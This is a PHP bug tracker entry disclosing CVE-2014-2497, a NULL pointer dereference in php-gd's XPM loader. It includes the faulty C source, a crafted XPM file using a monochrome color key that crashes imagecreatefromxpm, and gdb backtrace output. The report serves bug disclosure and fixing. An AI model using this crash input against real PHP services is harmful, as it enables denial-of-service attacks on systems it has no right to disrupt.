|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
Patchesbug66901-fix.patch (last revision 2014-04-01 21:03 UTC by mejiaa at amazon dot com)Pull RequestsHistoryAllCommentsChangesGit/SVN commits
[2014-03-14 06:19 UTC] pajoye@php.net
-Status: Open
+Status: Feedback
[2014-03-14 06:19 UTC] pajoye@php.net
[2014-03-14 07:47 UTC] pajoye@php.net
[2014-03-14 18:26 UTC] remi@php.net
-Type: Bug
+Type: Security
-Private report: No
+Private report: Yes
-CVE-ID:
+CVE-ID: 2014-2497
[2014-04-01 21:06 UTC] mejiaa at amazon dot com
[2014-08-04 08:43 UTC] remi@php.net
-Assigned To:
+Assigned To: remi
[2014-08-04 08:51 UTC] remi@php.net
[2014-08-04 08:51 UTC] remi@php.net
-Status: Feedback
+Status: Closed
[2014-08-11 07:43 UTC] dmitry@php.net
[2014-08-14 00:52 UTC] tyrael@php.net
[2014-10-07 23:13 UTC] stas@php.net
[2014-10-07 23:24 UTC] stas@php.net
|
|||||||||||||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Thu Nov 21 12:01:29 2024 UTC |
Description: ------------ php-gd <= v5.4.17-2 'c_color' NULL pointer dereference so the bug is triggered in gdImageCreateFromXpm() on line 42 of gd/libgd/gdxpm.c: --------------------------------------------------------------------------------- gdImagePtr gdImageCreateFromXpm (char *filename) { XpmInfo info; XpmImage image; int i, j, k, number; char buf[5]; gdImagePtr im = 0; int *pointer; int red = 0, green = 0, blue = 0; int *colors; int ret; ret = XpmReadFileToXpmImage(filename, &image, &info); if (ret != XpmSuccess) { return 0; } if (!(im = gdImageCreate(image.width, image.height))) { goto done; } number = image.ncolors; colors = (int *) safe_emalloc(number, sizeof(int), 0); for (i = 0; i < number; i++) { switch (strlen (image.colorTable[i].c_color)) { // BOOM -------------------------------------------------------------------------------------------------------- The call to strlen() parses image.colorTable[i].c_color which is initialised as NULL if the particular color mapping uses a different key (such as monochrome/monovisual). The xpmColorKeys array stores all avaliable keys and can be found in libXpm: ---------------------------------------------------------------------------- const char *xpmColorKeys[] = { "s", /* key #1: symbol */ "m", /* key #2: mono visual */ "g4", /* key #3: 4 grays visual */ "g", /* key #4: gray visual */ "c", /* key #5: color visual */ }; The following xpm file will trigger the bug: -------------------------------------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", "FEDDDCCCCBBAB", --------------------------------------------- POC: php > imagecreatefromxpm("monochome-poc.xpm"); (gdb) p colorTable[0] $2 = {string = 0x7fa6cec524c0 "A", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58650 "#FFFFFF"} (gdb) p colorTable[1] $3 = {string = 0x7fa6cec58670 "B", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58690 "#CCCCCC"} (gdb) p colorTable[2] $4 = {string = 0x7fa6cec586b0 "C", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec586d0 "#999999"} (gdb) p colorTable[3] $5 = {string = 0x7fa6cec586f0 "D", symbolic = 0x0, m_color = 0x7fa6cec58710 "#666666", g4_color = 0x0, g_color = 0x0, c_color = 0x0} (gdb) p colorTable[4] $6 = {string = 0x7fa6cec58730 "E", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58750 "#333333"} (gdb) p colorTable[5] $7 = {string = 0x7fa6cec58770 "F", symbolic = 0x0, m_color = 0x0, g4_color = 0x0, g_color = 0x0, c_color = 0x7fa6cec58790 "#000000"} (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 39 movdqu (%rdi), %xmm1 (gdb) bt #0 __strlen_sse2_pminub () at ../sysdeps/x86_64/multiarch/strlen-sse2-pminub.S:39 #1 0x00007f009474942a in gdImageCreateFromXpm (filename=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/libgd/gdxpm.c:42 #2 0x00007f009473d2c2 in _php_image_create_from (ht=<optimized out>, return_value=0x7f00a169be98, image_type=6, tn=0x7f0094753c00 "XPM", func_p=0x7f0094749340 <gdImageCreateFromXpm>, ioctx_func_p=<optimized out>, return_value_used=<optimized out>, this_ptr=<optimized out>, return_value_ptr=<optimized out>) at /usr/src/debug/php-5.4.17/ext/gd/gd.c:2534 #3 0x00007f00a19e5181 in zend_do_fcall_common_helper_SPEC (execute_data=0x7f00a1665060) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:643 #4 0x00007f00a199f017 in execute (op_array=0x7f00a169acf8) at /usr/src/debug/php-5.4.17/Zend/zend_vm_execute.h:410 #5 0x00007f00a1932976 in zend_eval_stringl (str=str@entry=0x7f00a1699c88 "imagecreatefromxpm(\"0day/zero-day2.xpm\");\n", str_len=str_len@entry=42, retval_ptr=retval_ptr@entry=0x0, string_name=string_name@entry=0x7f00a1a0cbdf "php shell code") at /usr/src/debug/php-5.4.17/Zend/zend_execute_API.c:1197 #6 0x00007f00a181fcdf in readline_shell_run () at /usr/src/debug/php-5.4.17/ext/readline/readline_cli.c:664 #7 0x00007f00a19e78c4 in do_cli (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:986 #8 0x00007f00a179ea9a in main (argc=2, argv=0x7ffff35fc268) at /usr/src/debug/php-5.4.17/sapi/cli/php_cli.c:1364 Test script: --------------- /* XPM */ static char * gv_xpm[] = { "13 13 6 1", "A c #FFFFFF " /* "0" */, "B c #CCCCCC " /* "0.0399" */, "C c #999999 " /* "0.0798" */, "D m #666666 " /* "0.12" NOTE: this is monochrome/monovisual */, "E c #333333 " /* "0.16" */, "F c #000000 " /* "0.2" */, /* x-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ /* y-axis: 0 40 80 120 160 200 240 280 320 360 400 440 480 */ "FEDDDDCCCCCBA", "FEDDDCCCCBBAB", Expected result: ---------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Resource id #4 php > Actual result: -------------- php > print imagecreatefromxpm("monochome-poc.xpm")."\n"; Segmentation fault (core dumped)